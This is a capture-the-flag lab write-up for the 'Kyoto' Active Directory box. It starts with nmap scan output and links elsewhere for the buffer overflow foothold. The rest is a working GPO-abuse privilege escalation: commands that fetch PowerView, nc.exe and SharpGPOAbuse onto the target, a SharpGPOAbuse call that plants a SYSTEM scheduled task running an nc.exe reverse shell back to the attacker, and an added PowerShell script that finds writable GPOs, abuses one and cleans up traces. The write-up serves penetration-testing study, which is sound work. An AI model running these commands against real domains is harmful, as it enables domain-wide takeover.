OSCP lab: Kyoto
Key points (buffer overflow + privilege escalation via GPO abuse)
1. nmap scan
##
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.216.31 -sV -sC -Pn --min-rate 2500 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-31 08:08 EDT
Nmap scan report for 192.168.216.31
Host is up (0.37s latency).
Not shown: 65506 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-31 12:09:19Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: Kyotosoft.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open mountd 1-3 (RPC #100005)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: Kyotosoft.com0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=kyoto.Kyotosoft.com
| Not valid before: 2024-03-30T12:07:35
|_Not valid after: 2024-09-29T12:07:35
| rdp-ntlm-info:
| Target_Name: KYOTOSOFT
| NetBIOS_Domain_Name: KYOTOSOFT
| NetBIOS_Computer_Name: KYOTO
| DNS_Domain_Name: Kyotosoft.com
| DNS_Computer_Name: kyoto.Kyotosoft.com
| DNS_Tree_Name: Kyotosoft.com
| Product_Version: 10.0.20348
|_ System_Time: 2024-03-31T12:10:21+00:00
|_ssl-date: 2024-03-31T12:10:59+00:00; -1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
52256/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
52257/tcp open msrpc Microsoft Windows RPC
52272/tcp open msrpc Microsoft Windows RPC
52279/tcp open msrpc Microsoft Windows RPC
52284/tcp open msrpc Microsoft Windows RPC
52301/tcp open msrpc Microsoft Windows RPC
Service Info: Host: KYOTO; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-03-31T12:10:21
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 373.50 seconds
##########################
##
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sU -T4 -F 192.168.216.31
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-31 08:26 EDT
Nmap scan report for 192.168.216.31
Host is up (0.41s latency).
Not shown: 96 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
111/udp open rpcbind
123/udp open ntp
2049/udp open nfs
Nmap done: 1 IP address (1 host up) scanned in 8.46 seconds
2. User privileges (initial foothold)
## Buffer overflow: omitted here, see the walkthrough linked below
https://medium.com/@0xrave/kyoto-proving-grounds-practice-walkthrough-active-directory-820dfcff5ddd
3. Root privileges (escalation)
## Privilege escalation via GPO abuse:
##
https://medium.com/@0xrave/kyoto-proving-grounds-practice-walkthrough-active-directory-820dfcff5ddd
##################################################################
## Tool:
https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.0_x64/SharpGPOAbuse.exe
## Scenario:
## The current user is a member of the group policy group and the GPO management group, i.e. it can edit a GPO that applies to the DC, so GPO policy can be abused to escalate privileges:
## Method 1. Add the current user to the Administrators group, then log in with that user's credentials; this requires knowing the user's password.
## Method 2. Without the current user's password: create a new user, add it to the Administrators group, and log in with the new user's credentials.
## Method 3. Without the current user's password: use group policy to create a scheduled task that spawns a reverse shell with administrative (SYSTEM) privileges.
#####################################################################
## Method 3 in practice:
################
## Enumerate group policies: find the Default Domain Policy
## Dot-sourcing the script (. .\powerview.ps1) loads it into the current PowerShell session, so the functions it defines remain available for the following commands
#At kali machine, powerview.ps1 should at /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
python3 -m http.server 80
#At target machine, download powerview.ps1,
cd c:\temp
curl http://$kaliIP/powerview.ps1 -o powerview.ps1
#switch to powershell
powershell
. .\powerview.ps1
#Get-NetGPO is the legacy alias of Get-DomainGPO in current PowerView; either one lists the domain's GPOs
Get-NetGPO
########################################################################
## Upload nc.exe and SharpGPOAbuse.exe, then create a scheduled task that runs a reverse shell with administrative privileges
#Transfer nc.exe to the target machine, nc.exe can be found at /usr/share/windows-resources/binaries/nc.exe
#At kali machine
python3 -m http.server 80
#At target machine, download binaries
cd c:\temp
curl http://$kaliIP/nc.exe -o nc.exe
curl http://$kaliIP/SharpGPOAbuse.exe -o sharp.exe
#Execute SharpGPOAbuse.exe (downloaded as sharp.exe); run the command below in PowerShell.
#The task is an "immediate" scheduled task in the GPO's Computer Configuration, so it runs as SYSTEM on every machine the GPO applies to (Default Domain Policy: the whole domain, including the DC).
./sharp.exe --AddComputerTask --TaskName "test" --Author "Administrator" --Command "cmd.exe" --Arguments "/c c:\temp\nc.exe $kaliIP 80 -e cmd.exe" --GPOName "Default Domain Policy"
#At kali machine: stop the python http.server first, it is still bound to port 80
nc -nlvp 80
#At target machine, force the policy refresh so the immediate task is created and fires
gpupdate /force
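As an added example (not from the original walkthrough, nor from the PowerView or SharpGPOAbuse projects), this script performs the check a practitioner wants before running method 3 and also backs the scenario above, since methods 1 to 3 all rely on a GPO the current token can edit and that applies to the DC: it lists which GPOs the current token has write rights on, shows where each one is linked, and then issues the same SharpGPOAbuse call with an explicit IP and a listener port that does not collide with the python http.server. The Kali address, the port and the c:\temp paths are assumptions; Get-DomainGPO, Get-DomainObjectAcl, Get-DomainObject and ConvertFrom-SID are PowerView's own functions.

```powershell
# Added example, not part of the original walkthrough or of PowerView/SharpGPOAbuse.
# Assumes c:\temp\powerview.ps1 and c:\temp\sharp.exe (SharpGPOAbuse) are already
# on the target. $KaliIP and $Port are placeholders (assumptions) to fill in.
$KaliIP = "192.168.45.200"   # assumption: your Kali VPN address
$Port   = 443                # assumption: a port NOT used by the python http.server

. c:\temp\powerview.ps1

# 1. Collect every SID in the current token (user plus all groups) so that rights
#    granted to a group, not only to the user object, are matched.
$token  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($token.User.Value) + @($token.Groups | ForEach-Object { $_.Value })

# 2. Keep GPOs where one of our SIDs holds an allow-ACE with a right that lets us
#    edit the GPO. WriteProperty scoped to a single attribute (see the Attribute
#    column) is usually not enough; GenericAll/GenericWrite/WriteDacl/WriteOwner are.
$editRights = 'GenericAll|GenericWrite|WriteProperty|WriteDacl|WriteOwner'
$writable = foreach ($gpo in Get-DomainGPO) {
    Get-DomainObjectAcl -Identity $gpo.distinguishedname -ResolveGUIDs |
        Where-Object {
            $mySids -contains $_.SecurityIdentifier.Value -and
            "$($_.AceType)" -match 'AccessAllowed' -and
            "$($_.ActiveDirectoryRights)" -match $editRights
        } |
        ForEach-Object {
            [pscustomobject]@{
                GPO       = $gpo.displayname
                Guid      = $gpo.name                 # {GUID} used in gPLink
                Rights    = $_.ActiveDirectoryRights
                Attribute = $_.ObjectAceType          # empty = the whole object
                Via       = ConvertFrom-SID $_.SecurityIdentifier.Value
            }
        }
}
if (-not $writable) { throw "No GPO is writable by the current token; GPO abuse does not apply." }
$writable | Format-Table -AutoSize

# 3. Show where each writable GPO is linked: an immediate task only runs on
#    computers under a linked container. The Default Domain Policy is linked at
#    the domain root, so it reaches the DC itself (and every other domain host).
$writable | Select-Object -ExpandProperty Guid -Unique | ForEach-Object {
    $guid = $_
    Get-DomainObject -LDAPFilter "(gplink=*$guid*)" -Properties distinguishedname |
        ForEach-Object { "{0} is linked at {1}" -f $guid, $_.distinguishedname }
}

# 4. Abuse the first writable GPO. The immediate task runs as SYSTEM at the next
#    policy refresh on every machine the GPO applies to, so it is loud: remove the
#    ScheduledTasks.xml it writes under <gpcfilesyspath>\Machine\Preferences\ScheduledTasks afterwards.
$target = ($writable | Select-Object -First 1).GPO
& c:\temp\sharp.exe --AddComputerTask --TaskName "test" --Author "Administrator" `
    --Command "cmd.exe" `
    --Arguments "/c c:\temp\nc.exe $KaliIP $Port -e cmd.exe" `
    --GPOName "$target"

# 5. Force a refresh on the DC so the task is created and fires; the listener
#    (nc -nlvp $Port on Kali) must already be running at this point.
gpupdate /force
```

Run it in the same PowerShell session used for the original commands. Step 2 is the part worth keeping even outside this box: it tells you whether the access you have is to the GPO object itself (enough for SharpGPOAbuse) or only to a single attribute, and step 3 tells you whether the DC is actually in scope of that GPO before you make noise with a SYSTEM task.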
########################################################################
## Kali receives the reverse shell:
4. Summary: